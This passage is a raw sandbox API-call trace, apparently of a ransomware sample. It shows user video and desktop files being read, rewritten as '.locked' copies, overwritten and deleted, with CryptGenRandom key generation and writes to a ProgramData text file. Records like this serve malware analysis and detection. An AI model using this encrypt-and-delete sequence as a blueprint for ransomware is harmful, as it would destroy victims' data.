dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0317.830] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0317.830] WriteFile (in: hFile=0x1a4, lpBuffer=0x125ec140*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec140*, lpNumberOfBytesWritten=0x125e5e64*=0x46, lpOverlapped=0x0) returned 1 [0317.831] CloseHandle (hObject=0x1a4) returned 1 [0317.831] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\-QGqmvZ9wX70bWC-Lq.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\-qgqmvz9wx70bwc-lq.flv")) returned 1 [0317.834] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.959] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0317.962] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0317.963] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0317.963] SetEvent (hEvent=0x150) returned 1 [0317.963] SetEvent (hEvent=0x1e8) returned 1 [0317.963] SetEvent (hEvent=0x20c) returned 1 [0317.963] SetEvent (hEvent=0x1dc) returned 1 [0317.982] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\-QGqmvZ9wX70bWC-Lq.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\-qgqmvz9wx70bwc-lq.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0318.082] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.257] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0318.257] WriteFile (in: hFile=0x1a4, lpBuffer=0x14c64000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x14c64000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.458] CloseHandle (hObject=0x1a4) returned 1 [0318.505] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\-QGqmvZ9wX70bWC-Lq.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\-qgqmvz9wx70bwc-lq.flv")) returned 1 [0318.625] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.656] SetEvent (hEvent=0x1e8) returned 1 [0318.656] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.659] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.678] SetEvent (hEvent=0x184) returned 1 [0318.678] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.682] SetEvent (hEvent=0x214) returned 1 [0318.682] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.868] SetEvent (hEvent=0x21c) returned 1 [0318.868] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0318.895] SetEvent (hEvent=0x190) returned 1 [0318.895] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.479] SetEvent (hEvent=0x198) returned 1 [0319.479] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.627] SetEvent (hEvent=0x214) returned 1 [0319.627] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.854] SetEvent (hEvent=0x198) returned 1 [0319.854] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.858] SetEvent (hEvent=0x1f0) returned 1 [0319.858] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.859] SetEvent (hEvent=0x190) returned 1 [0319.859] SetEvent (hEvent=0x134) returned 1 [0319.859] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0319.877] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\O-H60h1HeRHC e51ETm0.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\o-h60h1herhc e51etm0.flv")) returned 1 [0320.409] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.437] SetEvent (hEvent=0x22c) returned 1 [0320.437] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.440] SetEvent (hEvent=0x14c) returned 1 [0320.440] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.463] SetEvent (hEvent=0x1dc) returned 1 [0320.463] SetEvent (hEvent=0x190) returned 1 [0320.463] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.495] SetEvent (hEvent=0x12c) returned 1 [0320.495] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.509] SetEvent (hEvent=0x22c) returned 1 [0320.509] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390240*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x12390240*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0320.511] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.637] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.644] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.650] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.701] WriteFile (in: hFile=0x1b0, lpBuffer=0x1239a060*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x125dce64, lpOverlapped=0x0 | out: lpBuffer=0x1239a060*, lpNumberOfBytesWritten=0x125dce64*=0x2e, lpOverlapped=0x0) returned 1 [0320.701] CloseHandle (hObject=0x1b0) returned 1 [0320.701] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\_wJ5AOb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_wj5aob.avi")) returned 1 [0320.716] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.902] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x102 [0320.904] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0320.904] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0320.904] SetEvent (hEvent=0x150) returned 1 [0320.904] SetEvent (hEvent=0x14c) returned 1 [0320.904] SetEvent (hEvent=0x20c) returned 1 [0320.940] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\_wJ5AOb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_wj5aob.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0320.942] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.002] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125dce88 | out: lpMode=0x125dce88) returned 0 [0321.002] SetEvent (hEvent=0x190) returned 1 [0321.004] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.005] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.042] SetEvent (hEvent=0x14c) returned 1 [0321.042] SetEvent (hEvent=0x1ac) returned 1 [0321.042] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.129] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e040*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x1263e040*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0321.191] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.206] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\z2V-dpx2Rj7m2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\z2v-dpx2rj7m2.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0321.206] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0321.206] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\z2V-dpx2Rj7m2.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\z2v-dpx2rj7m2.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0321.246] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.324] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0321.324] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.389] ReadFile (in: hFile=0x1a4, lpBuffer=0x13450000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276fd68, lpOverlapped=0x0 | out: lpBuffer=0x13450000*, lpNumberOfBytesRead=0x1276fd68*=0x16570, lpOverlapped=0x0) returned 1 [0321.392] WriteFile (in: hFile=0x200, lpBuffer=0x13450000*, nNumberOfBytesToWrite=0x16570, lpNumberOfBytesWritten=0x1276fd74, lpOverlapped=0x0 | out: lpBuffer=0x13450000*, lpNumberOfBytesWritten=0x1276fd74*=0x16570, lpOverlapped=0x0) returned 1 [0321.516] ReadFile (in: hFile=0x1a4, lpBuffer=0x13450000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276fd68, lpOverlapped=0x0 | out: lpBuffer=0x13450000*, lpNumberOfBytesRead=0x1276fd68*=0x0, lpOverlapped=0x0) returned 1 [0321.517] CloseHandle (hObject=0x200) returned 1 [0321.550] CloseHandle (hObject=0x1a4) returned 1 [0321.550] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.552] SetEvent (hEvent=0x184) returned 1 [0321.552] SetEvent (hEvent=0x1ac) returned 1 [0321.552] SetEvent (hEvent=0x12c) returned 1 [0321.552] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.553] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0321.553] SetEvent (hEvent=0x12c) returned 1 [0321.553] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0321.553] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1276fe94 | out: lpMode=0x1276fe94) returned 0 [0321.553] WriteFile (in: hFile=0x1a4, lpBuffer=0x1263c0c0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x1276fe64, lpOverlapped=0x0 | out: lpBuffer=0x1263c0c0*, lpNumberOfBytesWritten=0x1276fe64*=0x2c, lpOverlapped=0x0) returned 1 [0321.553] CloseHandle (hObject=0x1a4) returned 1 [0321.554] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\ulGMr.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ulgmr.swf")) returned 1 [0321.566] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.567] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0321.567] SetEvent (hEvent=0x150) returned 1 [0321.567] SetEvent (hEvent=0x12c) returned 1 [0321.570] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.572] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.573] SetEvent (hEvent=0x1ac) returned 1 [0321.573] SetEvent (hEvent=0x12c) returned 1 [0321.573] SetEvent (hEvent=0x184) returned 1 [0321.573] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.573] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0321.573] SetEvent (hEvent=0x150) returned 1 [0321.573] SetEvent (hEvent=0x184) returned 1 [0321.586] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.586] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0321.586] SetEvent (hEvent=0x184) returned 1 [0321.588] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.589] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.589] SetEvent (hEvent=0x14c) returned 1 [0321.589] SetEvent (hEvent=0x12c) returned 1 [0321.589] SetEvent (hEvent=0x184) returned 1 [0321.589] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.590] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0321.590] SetEvent (hEvent=0x184) returned 1 [0321.590] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.590] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb30, ulCount=0x10, ulNumEntriesRemoved=0x3392fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb30, ulNumEntriesRemoved=0x3392fb10) returned 0 [0321.590] SetEvent (hEvent=0x184) returned 1 [0321.591] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.591] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1) returned 0x0 [0321.592] SetEvent (hEvent=0x184) returned 1 [0321.592] SetEvent (hEvent=0x12c) returned 1 [0321.592] SetEvent (hEvent=0x14c) returned 1 [0321.592] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.592] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3392fb34, ulCount=0x10, ulNumEntriesRemoved=0x3392fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3392fb34, ulNumEntriesRemoved=0x3392fb14) returned 0 [0321.592] SetEvent (hEvent=0x150) returned 1 [0321.592] SetEvent (hEvent=0x14c) returned 1 [0321.592] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\ulGMr.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ulgmr.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0321.593] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e3e88 | out: lpMode=0x125e3e88) returned 0 [0321.593] WriteFile (in: hFile=0x1f4, lpBuffer=0x1a058000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e3e78, lpOverlapped=0x0 | out: lpBuffer=0x1a058000*, lpNumberOfBytesWritten=0x125e3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.614] CloseHandle (hObject=0x1f4) returned 1 [0321.614] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\ulGMr.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ulgmr.swf")) returned 1 [0321.618] WriteFile (in: hFile=0x240, lpBuffer=0x19f5e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x19f5e000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.637] CloseHandle (hObject=0x240) returned 1 [0321.637] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\z2V-dpx2Rj7m2.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\z2v-dpx2rj7m2.flv")) returned 1 [0321.643] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.657] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.685] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.707] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.724] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) returned 0x0 [0321.809] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0xffffffff) Thread: id = 441 os_tid = 0xb98 [0260.681] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33a6ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33a6ff58*=0x1cc) returned 1 [0260.681] SetEvent (hEvent=0x104) returned 1 [0260.682] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d0 [0260.682] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0260.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1266a000, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0260.707] CloseHandle (hObject=0x1d4) returned 1 [0260.707] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0260.709] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0260.711] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x102 [0260.713] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0260.713] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x1) returned 0x0 [0260.715] SetEvent (hEvent=0x1f0) returned 1 [0260.715] SetEvent (hEvent=0x1e8) returned 1 [0260.715] SetEvent (hEvent=0x1dc) returned 1 [0260.715] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0260.716] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33a6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33a6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33a6fb34, ulNumEntriesRemoved=0x33a6fb14) returned 0 [0260.717] SetEvent (hEvent=0x150) returned 1 [0260.717] SetEvent (hEvent=0x1e8) returned 1 [0260.717] SetEvent (hEvent=0x1dc) returned 1 [0260.717] SetEvent (hEvent=0x1f0) returned 1 [0260.717] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a3a24*=0xa) returned 1 [0260.719] SetEvent (hEvent=0x1f0) returned 1 [0260.719] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PCqRptQW6vY1N.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pcqrptqw6vy1n.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0260.719] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0260.719] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PCqRptQW6vY1N.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pcqrptqw6vy1n.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0261.743] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.098] GetConsoleMode (in: hConsoleHandle=0x1d4, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0262.098] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0262.098] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0262.099] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0262.099] WriteFile (in: hFile=0x1d4, lpBuffer=0x1262f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x1262f000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0262.101] SetEvent (hEvent=0x134) returned 1 [0262.101] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.171] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.303] SetEvent (hEvent=0x184) returned 1 [0262.303] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.441] SetEvent (hEvent=0x1f0) returned 1 [0262.441] SetEvent (hEvent=0x134) returned 1 [0262.442] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.879] SetEvent (hEvent=0x1f0) returned 1 [0262.879] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.947] SetEvent (hEvent=0x190) returned 1 [0262.947] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0262.997] SetEvent (hEvent=0x12c) returned 1 [0262.997] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0263.012] SetEvent (hEvent=0x12c) returned 1 [0263.012] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0263.012] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x124a1e94 | out: lpMode=0x124a1e94) returned 0 [0263.012] WriteFile (in: hFile=0x1bc, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x124a1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x124a1e64*=0x33, lpOverlapped=0x0) returned 1 [0263.013] CloseHandle (hObject=0x1bc) returned 1 [0263.014] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\DWVUXEoQZyD.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dwvuxeoqzyd.flv")) returned 1 [0263.027] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0266.041] SetEvent (hEvent=0x1b8) returned 1 [0266.041] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0266.346] SetEvent (hEvent=0x104) returned 1 [0266.347] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0268.853] SetEvent (hEvent=0x22c) returned 1 [0268.853] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0269.021] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x34230000 [0269.107] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\DWVUXEoQZyD.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dwvuxeoqzyd.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0270.039] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.102] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0270.102] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.183] SetEvent (hEvent=0x1dc) returned 1 [0270.183] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.193] SetEvent (hEvent=0x220) returned 1 [0270.193] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.198] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.204] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.225] SetEvent (hEvent=0x22c) returned 1 [0270.225] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.229] SetEvent (hEvent=0x104) returned 1 [0270.229] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.259] SetEvent (hEvent=0x22c) returned 1 [0270.259] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.289] SetEvent (hEvent=0x22c) returned 1 [0270.289] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.313] SetEvent (hEvent=0x22c) returned 1 [0270.313] SetEvent (hEvent=0x1ac) returned 1 [0270.313] SetEvent (hEvent=0x104) returned 1 [0270.313] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0270.925] SetEvent (hEvent=0x14c) returned 1 [0270.925] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0272.937] SetEvent (hEvent=0x214) returned 1 [0272.937] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0273.164] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0273.183] SetEvent (hEvent=0x21c) returned 1 [0273.183] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0273.466] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\eT_8y6.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\et_8y6.mp3")) returned 1 [0273.713] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0xffffffff) returned 0x0 [0274.217] 